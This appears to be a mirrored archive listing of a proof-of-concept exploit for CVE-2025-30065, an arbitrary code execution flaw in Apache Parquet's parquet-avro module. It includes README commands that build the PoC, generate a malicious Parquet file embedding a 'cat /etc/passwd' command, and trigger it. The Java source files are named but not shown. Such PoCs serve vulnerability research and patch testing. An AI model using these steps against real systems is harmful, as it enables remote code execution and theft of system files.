CVE-2025-30065 PoC — Apache Parquet 代码问题漏洞

Source

https://github.com/ron-imperva/CVE-2025-30065-PoC

Associated Vulnerability

Title:Apache Parquet 代码问题漏洞 (CVE-2025-30065)
Description:Apache Parquet是美国阿帕奇（Apache）基金会的一种列式存储格式。可用于 Hadoop 生态系统中的任何项目。 Apache Parquet 1.15.0及之前版本存在代码问题漏洞，该漏洞源于parquet-avro模块的模式解析可能导致执行任意代码。

Description

CVE-2025-30065 PoC

Readme

# CVE-2025-30065 PoC

# Usage

## Build the image
```sh
docker build -t cve-2025-30065 .
```

## Generate the malicious Parquet
```sh
docker run --rm -v $(pwd):/poc/out cve-2025-30065 generate "cat /etc/passwd" ./out/malicious.parquet
```

## Trigger the exploit
```sh
docker run --rm -v $(pwd):/poc/out cve-2025-30065 trigger ./out/malicious.parquet
```

File Snapshot


 [4.0K]  /data/pocs/98200fadeaf89230ed0b77f89ed19f0b88470ffe
├── [ 406]  Dockerfile
├── [4.0K]  poc
│   ├── [ 350]  entrypoint.sh
│   ├── [2.2K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               ├── [2.2K]  GeneratePayload.java
│               ├── [1.6K]  MaliciousObject.java
│               └── [1.7K]  TriggerVuln.java
└── [ 354]  README.md

4 directories, 7 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!